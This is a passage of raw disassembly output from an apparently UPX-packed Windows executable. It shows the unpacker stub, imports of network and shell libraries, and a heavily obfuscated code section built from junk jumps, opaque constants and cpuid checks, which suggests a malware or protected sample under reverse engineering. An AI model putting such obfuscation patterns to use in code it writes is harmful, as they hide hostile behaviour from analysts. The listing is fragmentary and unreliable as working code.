loc_421BAC: ; CODE XREF: UPX1:00421BCE�j
mov eax, [edi]
or eax, eax
jz short loc_421BF7
mov ebx, [edi+4]
lea eax, [eax+esi+21000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+210A0h]
xchg eax, ebp
loc_421BC9: ; CODE XREF: UPX1:00421BEF�j
mov al, [edi]
inc edi
or al, al
jz short loc_421BAC
mov ecx, edi
jns short near ptr loc_421BDA+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_421BDA: ; CODE XREF: UPX1:00421BD2�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+210A4h]
or eax, eax
jz short loc_421BF1
mov [ebx], eax
add ebx, 4
jmp short loc_421BC9
; ---------------------------------------------------------------------------
loc_421BF1: ; CODE XREF: UPX1:00421BE8�j
call dword ptr [esi+210A8h]
loc_421BF7: ; CODE XREF: UPX1:00421BB0�j
popa
jmp loc_4167F1
; ---------------------------------------------------------------------------
align 800h
UPX1 ends
; Section 3. (virtual address 00022000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00022000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
UPX2 segment para public 'DATA' use32
assume cs:UPX2
;org 422000h
dword_422000 dd 3 dup(0) ; sub_43DFAB+9�o
dd 220E0h, 220A0h, 3 dup(0)
dd 220EDh, 220B0h, 3 dup(0)
dd 220FAh, 220B8h, 3 dup(0)
dd 22105h, 220C0h, 3 dup(0)
dd 22112h, 220C8h, 3 dup(0)
dd 2211Eh, 220D0h, 3 dup(0)
dd 22129h, 220D8h, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C50290h, 0
dd 7712A63Fh, 0
dd 7CA41110h, 0
aNia db 'A~',0
align 4
aIlq db 'ӈq',0
align 10h
aKernel32_dll_0 db 'KERNEL32.DLL',0
aAdvapi32_dll db 'ADVAPI32.dll',0
aMsvcrt_dll db 'MSVCRT.dll',0
aOleaut32_dll db 'OLEAUT32.dll',0
aShell32_dll db 'SHELL32.dll',0
aUser32_dll db 'USER32.dll',0
aWs2_32_dll_0 db 'WS2_32.dll',0
dd 6F4C0000h, 694C6461h, 72617262h, 4179h, 50746547h, 41636F72h
dd 65726464h, 7373h, 74697845h, 636F7250h, 737365h, 65520000h
dd 6F6C4367h, 654B6573h, 79h, 6C696563h, 68530000h, 456C6C65h
dd 75636578h, 416574h, 73770000h, 6E697270h, 416674h, 39Ch dup(0)
UPX2 ends
; ---------------------------------------------------------------------------
; Section 4. (virtual address 00023000)
; Virtual size : 0000D000 ( 53248.)
; Section size in file : 0000D000 ( 53248.)
; Offset to raw data for section: 00023000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_7hdaygc1 segment para public 'CODE' use32
assume cs:_7hdaygc1
;org 423000h
; START OF FUNCTION CHUNK FOR sub_42A833
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
loc_423000: ; CODE XREF: sub_42A833-4791�j
and eax, esi
sbb ecx, esi
loc_423004: ; CODE XREF: sub_42A833:loc_42C938�j
call sub_42D757
mov edx, 2C4AC9D1h
jmp loc_42B1D4
; END OF FUNCTION CHUNK FOR sub_42A833
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B74A
loc_423013: ; CODE XREF: sub_42B74A:loc_426484�j
jnz loc_4244D7
jmp loc_428E37
; END OF FUNCTION CHUNK FOR sub_42B74A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425F27
loc_42301E: ; CODE XREF: sub_425F27+4�j
add eax, 135AAEF4h
push eax
call sub_429B49
mov ds:dword_42B9B8, eax
cmp ds:dword_42B9B8, 0
loc_423036: ; CODE XREF: sub_42F05E:loc_4273C2�j
jnz loc_42DC3B
jmp loc_429ED5
; END OF FUNCTION CHUNK FOR sub_425F27
; ---------------------------------------------------------------------------
cdq
jmp loc_428992
; ---------------------------------------------------------------------------
loc_423047: ; CODE XREF: _7hdaygc1:004267FD�j
mov ecx, 9452920Ch
shl ebx, 0Fh
test ebx, eax
jmp loc_42DEF5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42821A
loc_423056: ; CODE XREF: sub_42821A:loc_42E1AD�j
xchg ebp, ebx
sub ecx, eax
; END OF FUNCTION CHUNK FOR sub_42821A
; START OF FUNCTION CHUNK FOR sub_429318
loc_42305A: ; CODE XREF: sub_429318+2D64�j
mov ebp, 0E8146ABh
test ecx, esi
jmp loc_4254E6
; END OF FUNCTION CHUNK FOR sub_429318
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_17. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A39
loc_423067: ; CODE XREF: sub_426A39+4128�j
jmp nullsub_65
; END OF FUNCTION CHUNK FOR sub_426A39
; ---------------------------------------------------------------------------
or ebp, 7876A79Bh
jmp sub_42CCDD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42512A
loc_423077: ; CODE XREF: sub_42512A:loc_42744B�j
jge loc_42B280
; END OF FUNCTION CHUNK FOR sub_42512A
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_42307D: ; CODE XREF: sub_42C16F-ABF�j
jmp loc_428E85
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
pop eax
mov ebx, edx
popf
jmp loc_42B280
; ---------------------------------------------------------------------------
loc_42308B: ; CODE XREF: _7hdaygc1:0042A202�j
mov ecx, 107CA6D2h
adc edi, ebp
loc_423092: ; CODE XREF: _7hdaygc1:loc_42A1EA�j
xor ebx, 337A383Dh
add ebx, 0BF81FE58h
jmp loc_42F7F8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ED2A
loc_4230A3: ; CODE XREF: sub_42ED2A:loc_42A9DB�j
; sub_42ED2A+D�j
call sub_429B3E
mov [ebp-0Ah], al
loc_4230AB: ; CODE XREF: sub_429B36+3�j
jno loc_42A65D
mov eax, [ebp-4]
cmp byte ptr [eax], 0
jnz loc_42583E
jmp loc_42A644
; END OF FUNCTION CHUNK FOR sub_42ED2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_4230C2: ; CODE XREF: sub_4291EA-2724�j
jz loc_425954
jmp loc_4293D4
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D9E1
loc_4230CD: ; CODE XREF: sub_42D9E1+C�j
mov ebp, esp
push esi
mov esi, ecx
xchg esi, [esp+8+var_8]
mov esp, ebp
xchg eax, [esp+4+var_4]
jmp loc_42FBC1
; END OF FUNCTION CHUNK FOR sub_42D9E1
; ---------------------------------------------------------------------------
loc_4230DF: ; CODE XREF: _7hdaygc1:loc_42A1F0�j
push ebx
push 934B27F9h
pop ebx
sub ebx, 8F4A1B44h
and ebx, 151F97C8h
cmp ebx, 6B51A738h
jmp loc_42E5E5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AB9F
loc_4230FD: ; CODE XREF: sub_42AB9F:loc_42392E�j
xor [esi], edx
jmp loc_42E845
; END OF FUNCTION CHUNK FOR sub_42AB9F
; ---------------------------------------------------------------------------
loc_423104: ; CODE XREF: _7hdaygc1:0042B65C�j
mov eax, 1
xor edx, edx
cpuid
call sub_4232C2
ja loc_425271
jmp sub_423D6F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_122. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F02
loc_42311E: ; CODE XREF: sub_423F02+948D�j
jmp loc_42CE6C
; END OF FUNCTION CHUNK FOR sub_423F02
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BAE7
loc_423123: ; CODE XREF: sub_42BAE7+16A2�j
jnz loc_429D36
loc_423129: ; CODE XREF: sub_42A2EF+1854�j
jmp sub_42C1AF
; END OF FUNCTION CHUNK FOR sub_42BAE7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C3B
loc_42312E: ; CODE XREF: sub_42348E+D�j
jmp sub_42A94C
; END OF FUNCTION CHUNK FOR sub_425C3B
; ---------------------------------------------------------------------------
pop edi
jmp loc_4266A1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F02
loc_423139: ; CODE XREF: sub_423F02:loc_42B111�j
jnz loc_423B92
jmp loc_42D389
; END OF FUNCTION CHUNK FOR sub_423F02
; =============== S U B R O U T I N E =======================================
sub_423144 proc near ; DATA XREF: sub_42E32F-4DA4�o
mov edx, 0A22F8A70h
call sub_42C763
mov ds:dword_427C84, eax
call sub_42D757
mov edx, 0A2CD59D9h
call sub_42C763
mov ds:dword_423B1C, eax
retn
sub_423144 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425F27
loc_423168: ; CODE XREF: sub_425F27+3FB4�j
jmp loc_42A3D5
; END OF FUNCTION CHUNK FOR sub_425F27
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4237DA
loc_42316D: ; CODE XREF: sub_4237DA+1�j
jmp loc_42A858
; END OF FUNCTION CHUNK FOR sub_4237DA
; =============== S U B R O U T I N E =======================================
sub_423172 proc near ; CODE XREF: _7hdaygc1:004237E8�j
; sub_42FB6E+6�p
arg_0 = dword ptr 4
arg_C = dword ptr 10h
; FUNCTION CHUNK AT 00423214 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042368B SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004239F7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424C01 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00424C8B SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00424E4D SIZE 0000002B BYTES
; FUNCTION CHUNK AT 00425C8D SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00425F3A SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00425FB4 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042623D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004263D7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426493 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004265A0 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 004265E8 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00426B80 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004270B8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004272BE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00427450 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004283F4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428571 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004289A1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428D52 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429093 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042965F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429BC9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429DBA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429FD5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AAA7 SIZE 00000028 BYTES
; FUNCTION CHUNK AT 0042AF9A SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042B75E SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042BC85 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042BE13 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042C2E5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042CAD7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CFB3 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 0042DA57 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DFB8 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042EE70 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042F083 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042F6E9 SIZE 0000000A BYTES
xchg eax, [esp+0]
pop eax
pop ebp
mov eax, ds:dword_42E548
or eax, eax
jnz loc_426493
jmp loc_427450
sub_423172 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jmp loc_42DF90
; ---------------------------------------------------------------------------
push 865BB9E6h
xchg edi, [esp]
mov eax, edi
pop edi
jmp loc_4258D5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423648
loc_42319F: ; CODE XREF: sub_423648+10�j
cmp dword ptr [ebp-1Ch], 66h
jnz loc_427D73
mov eax, 6
sub eax, [ebp-0Ch]
jmp loc_426E60
; END OF FUNCTION CHUNK FOR sub_423648
; ---------------------------------------------------------------------------
locret_4231B6: ; CODE XREF: _7hdaygc1:loc_42A0FF�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FAB8
loc_4231B7: ; CODE XREF: sub_42FAB8+11�j
jmp loc_4240F3
; END OF FUNCTION CHUNK FOR sub_42FAB8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E32F
loc_4231BC: ; CODE XREF: sub_42E32F+12�j
jmp nullsub_217
; END OF FUNCTION CHUNK FOR sub_42E32F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_4231C1: ; CODE XREF: sub_423DFC+8FF6�j
jmp loc_427EA3
; END OF FUNCTION CHUNK FOR sub_423DFC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA07
loc_4231C6: ; CODE XREF: sub_42AA07-36AD�j
jmp loc_4231EF
; END OF FUNCTION CHUNK FOR sub_42AA07
; ---------------------------------------------------------------------------
pop ecx
call sub_428C3B
xor edx, edx
push offset loc_423C69
jmp loc_424FE0
; ---------------------------------------------------------------------------
locret_4231DD: ; CODE XREF: _7hdaygc1:0042423F�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4232DA
loc_4231DE: ; CODE XREF: sub_4232DA:loc_424266�j
; sub_4232DA+F9F�j
sub ebx, 551D846Ch
cmp ebx, 55813C09h
jmp loc_429787
; END OF FUNCTION CHUNK FOR sub_4232DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA07
loc_4231EF: ; CODE XREF: sub_42AA07:loc_4231C6�j
jge loc_423B34
loc_4231F5: ; CODE XREF: _7hdaygc1:00424092�j
jmp sub_42828C
; END OF FUNCTION CHUNK FOR sub_42AA07
; ---------------------------------------------------------------------------
adc ebp, edi
jmp loc_423B33
; ---------------------------------------------------------------------------
loc_423201: ; CODE XREF: _7hdaygc1:0042FD5D�j
js loc_426792
xor esi, 0A4AE4D30h
xchg ebp, ecx
jmp loc_42A9D0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_423214: ; CODE XREF: sub_423172+BF29�j
pop eax
jb loc_4289A1
xor esi, ebx
jmp loc_42CFB3
; END OF FUNCTION CHUNK FOR sub_423172
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_124. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_423223: ; CODE XREF: _7hdaygc1:loc_42383E�j
jnz loc_42CF98
jmp loc_4239BF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_181. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A92E
loc_42322F: ; CODE XREF: sub_42A92E+4493�j
jmp loc_42CA83
; END OF FUNCTION CHUNK FOR sub_42A92E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282A9
loc_423234: ; CODE XREF: sub_4282A9+32C4�j
jmp loc_428FBD
; END OF FUNCTION CHUNK FOR sub_4282A9
; ---------------------------------------------------------------------------
loc_423239: ; CODE XREF: _7hdaygc1:00426CF3�j
jz loc_42CAFC
jmp loc_42B1D9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FAB8
loc_423244: ; CODE XREF: sub_42FAB8-B9AE�j
add edx, 0BD631EF2h
mov [edx], eax
pop edx
call sub_42B14C
; END OF FUNCTION CHUNK FOR sub_42FAB8
; START OF FUNCTION CHUNK FOR sub_425522
loc_423252: ; CODE XREF: sub_425522+5�j
push 68BA13B2h
pop esi
sub esi, 98DB1574h
and esi, 125B1D09h
rol esi, 10h
jmp loc_425851
; END OF FUNCTION CHUNK FOR sub_425522
; ---------------------------------------------------------------------------
loc_42326C: ; CODE XREF: _7hdaygc1:loc_4270C9�j
; _7hdaygc1:0042DBCB�j
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call eax
mov [ebp-4], eax
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_42327A: ; CODE XREF: _7hdaygc1:00428662�j
; sub_4291EA+447F�j ...
dec ds:dword_42B9A0
jmp loc_428409
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42986C
loc_423285: ; CODE XREF: sub_42986C:loc_429F29�j
pop edi
xor edi, 0A32E647Dh
cmp edi, 0A675D99h
jmp loc_42D00E
; END OF FUNCTION CHUNK FOR sub_42986C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EBD6
loc_423297: ; CODE XREF: sub_42EBD6-6080�j
shl edi, 3
loc_42329A: ; CODE XREF: sub_42EBD6:loc_423464�j
mov eax, 1
xor edx, edx
cpuid
and eax, 0FFFh
add [esi], eax
call sub_428556
loc_4232AF: ; DATA XREF: sub_429A26+4C3F�o
add ecx, ebp
add ecx, 0F5F75D15h
push offset loc_4234DC
jmp nullsub_160
; END OF FUNCTION CHUNK FOR sub_42EBD6
; ---------------------------------------------------------------------------
loc_4232C1: ; CODE XREF: _7hdaygc1:0042539B�j
popf
; =============== S U B R O U T I N E =======================================
sub_4232C2 proc near ; CODE XREF: _7hdaygc1:0042310D�p
; FUNCTION CHUNK AT 00423B13 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424C74 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00428637 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B305 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042B7E9 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042B9FB SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042D3E8 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042D434 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042E25A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042E676 SIZE 00000019 BYTES
xchg ebx, [esp+0]
pop ebx
and eax, 0FFFh
add [esi], eax
and edx, 0FFFFDDFFh
xor [esi], edx
jmp loc_424C74
sub_4232C2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4232DA proc near ; CODE XREF: sub_42C443:loc_424AA3�j
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004231DE SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00424063 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004241E8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424266 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00427288 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00427CA9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428137 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042970D SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00429787 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00429BBD SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042BA64 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042BF5B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042C65E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042D42F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DA8C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042FC73 SIZE 00000011 BYTES
push ebx
push 0A108E2BEh
xchg ebp, [esp+8+var_8]
mov ebx, ebp
pop ebp
xor ebx, 466B83Ch
add ebx, 9683F324h
test ebx, 800h
jmp loc_424266
sub_4232DA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov [ecx], ebp
jmp sub_42A473
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA9B
loc_423304: ; CODE XREF: sub_42AA9B-107A�j
jz loc_42ED1A
jmp loc_428983
; END OF FUNCTION CHUNK FOR sub_42AA9B
; ---------------------------------------------------------------------------
adc ecx, 0AA68487Ah
jmp sub_424588
; ---------------------------------------------------------------------------
loc_42331A: ; DATA XREF: sub_42DBAE+A�o
xchg edx, [esp]
mov eax, [ebp-4]
push offset loc_42EC0A
jmp locret_42735F
; ---------------------------------------------------------------------------
loc_42332A: ; DATA XREF: sub_42F65A:loc_4248FC�o
mov eax, [eax]
or eax, eax
jnz loc_42DE2A
jmp loc_42E588
; ---------------------------------------------------------------------------
push 160765EBh
jmp loc_42380F
; ---------------------------------------------------------------------------
xor esi, 95A29294h
add edi, ebx
jmp sub_42C119
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F4CE
loc_423350: ; CODE XREF: sub_42F4CE:loc_42F8B4�j
and edi, 0E41047DDh
rol ecx, 10h
jmp loc_428ADB
; END OF FUNCTION CHUNK FOR sub_42F4CE
; ---------------------------------------------------------------------------
pushf
jmp sub_426D10
; ---------------------------------------------------------------------------
loc_423364: ; DATA XREF: sub_4246D7:loc_424DD9�o
cmp dword ptr [ebp-14h], 4
jnz loc_42F411
mov eax, [ebp+8]
or dword ptr [eax-8], 4
mov eax, [ebp-4]
movzx eax, byte ptr [eax]
jmp loc_428048
; ---------------------------------------------------------------------------
loc_423380: ; CODE XREF: _7hdaygc1:loc_42FD62�j
test ecx, 256FAA7Eh
jmp loc_42FB7E
; ---------------------------------------------------------------------------
loc_42338B: ; CODE XREF: _7hdaygc1:00423FD7�j
xchg eax, [esp]
call sub_424F3E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C26B
loc_423393: ; CODE XREF: sub_42C26B-411C�j
jmp loc_4261C9
; END OF FUNCTION CHUNK FOR sub_42C26B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B74A
loc_423398: ; CODE XREF: sub_42B74A-5018�j
jno loc_424F43
or ebx, esi
jmp loc_4244D7
; END OF FUNCTION CHUNK FOR sub_42B74A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA9B
loc_4233A5: ; CODE XREF: sub_42AA9B-210E�j
cmp ecx, 81B47707h
jmp loc_42ED11
; END OF FUNCTION CHUNK FOR sub_42AA9B
; ---------------------------------------------------------------------------
loc_4233B0: ; DATA XREF: sub_42A4C2+12�o
mov eax, [eax]
xor edx, edx
add eax, [esp]
adc edx, [esp+4]
add esp, 8
xor eax, [esp]
jmp loc_42D679
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F8C4
loc_4233C6: ; CODE XREF: sub_42F8C4-60D1�j
push 7332BFF3h
pop edi
or edi, 26F92683h
xor edi, 923A5829h
sub edi, 0B7DDE877h
add edi, 0F914D808h
jmp loc_42C87E
; END OF FUNCTION CHUNK FOR sub_42F8C4
; ---------------------------------------------------------------------------
push ebx
mov ebx, eax
push offset loc_427E60
jmp loc_429081
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D3F2
loc_4233F6: ; CODE XREF: sub_42D3F2+14�j
mov [ebp-4], eax
mov eax, [ebp-4]
xchg esi, [esp+0]
mov ecx, esi
pop esi
pop ebp
retn 4
; END OF FUNCTION CHUNK FOR sub_42D3F2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EB24
loc_423406: ; CODE XREF: sub_42EB24-5CA4�j
jmp loc_42B5BD
; END OF FUNCTION CHUNK FOR sub_42EB24
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_42340B: ; CODE XREF: sub_42C443-3C9D�j
jmp loc_42D88A
; END OF FUNCTION CHUNK FOR sub_42C443
; =============== S U B R O U T I N E =======================================
sub_423410 proc near ; CODE XREF: sub_42D3F2+3�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00423DBE SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042472D SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042489A SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00424CEC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424FF6 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00426340 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004269DB SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00427F54 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00429917 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042A3F2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D81A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DACA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E583 SIZE 00000005 BYTES
push ebp
jmp loc_42D81A
sub_423410 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
locret_423416: ; CODE XREF: _7hdaygc1:loc_429FDB�j
retn
; ---------------------------------------------------------------------------
loc_423417: ; DATA XREF: _7hdaygc1:0042E9FD�o
xchg edi, [esp]
jmp loc_42F94C
; ---------------------------------------------------------------------------
push 6385BF2Ah
pop edx
xor edx, 0DA33377Bh
rol edx, 0Ah
jmp loc_423532
; ---------------------------------------------------------------------------
loc_423433: ; DATA XREF: sub_42F7E6:loc_42CD3F�o
xchg ecx, [esp]
push ecx
ror ebp, 10h
jmp loc_42B69A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426130
loc_42343F: ; CODE XREF: sub_426130+13�j
xor edi, 9D7CBA93h
sub edi, 991703D5h
add edi, 0ECA7B4E3h
and edi, 243C913Ah
xor edi, 13644CF9h
add edi, ebp
jmp loc_425712
; END OF FUNCTION CHUNK FOR sub_426130
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EBD6
loc_423464: ; CODE XREF: sub_42EBD6:loc_42847A�j
jz loc_42329A
jmp loc_423CA6
; END OF FUNCTION CHUNK FOR sub_42EBD6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA47
loc_42346F: ; CODE XREF: sub_42AA47:loc_424D04�j
; _7hdaygc1:00429654�j
add edi, 0E601BD5Fh
xor edi, 0A59E46D4h
add eax, edi
pop edi
mov eax, [eax]
mov byte ptr [eax], 0
jmp loc_42BFB9
; END OF FUNCTION CHUNK FOR sub_42AA47
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C3B
loc_423488: ; CODE XREF: sub_425C3B+5DE�j
jbe loc_42E08C
; END OF FUNCTION CHUNK FOR sub_425C3B
; =============== S U B R O U T I N E =======================================
sub_42348E proc near ; CODE XREF: sub_423A7D+10�p
arg_0 = dword ptr 4
xchg ecx, [esp+0]
pop ecx
add ebx, 8B2DFB97h
xchg ebx, [esp-4+arg_0]
jmp loc_42312E
sub_42348E endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_101. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B470
loc_4234A1: ; CODE XREF: sub_42B470:loc_4262AA�j
jz sub_42F56C
jmp loc_42E89C
; END OF FUNCTION CHUNK FOR sub_42B470
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F8DB
loc_4234AC: ; CODE XREF: sub_42F8DB-BAAF�j
cpuid
add [esi], eax
xor [esi], ebx
add [esi], ecx
xor [esi], edx
mov eax, 80000003h
xor ebx, ebx
jmp loc_42DAD4
; END OF FUNCTION CHUNK FOR sub_42F8DB
; ---------------------------------------------------------------------------
loc_4234C2: ; CODE XREF: _7hdaygc1:0042B3F3�j
sub eax, 2298B355h
rol eax, 0Bh
xor eax, 5F65A772h
popf
push offset sub_425C5F
jmp locret_42DC62
; ---------------------------------------------------------------------------
loc_4234DC: ; DATA XREF: sub_42EBD6-B91F�o
mov ecx, [ecx]
xor eax, ecx
pop ecx
mov word ptr [eax], 205Dh
push edi
push 20F806A2h
jmp loc_428D30
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F075
loc_4234F1: ; CODE XREF: sub_42F075:loc_425F81�j
; _7hdaygc1:0042D723�j
mov eax, [ebp-18h]
add eax, eax
cdq
add eax, [esp+0]
adc edx, [esp+arg_0]
add esp, 8
movzx eax, word ptr [eax]
shl eax, 2
jmp loc_4262C4
; END OF FUNCTION CHUNK FOR sub_42F075
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EFBC
loc_42350C: ; CODE XREF: sub_42EFBC-4C79�j
jz loc_42366D
; END OF FUNCTION CHUNK FOR sub_42EFBC
; START OF FUNCTION CHUNK FOR sub_42C209
loc_423512: ; CODE XREF: sub_42C209-8366�j
jmp loc_42F204
; END OF FUNCTION CHUNK FOR sub_42C209
; ---------------------------------------------------------------------------
not esi
jmp loc_423668
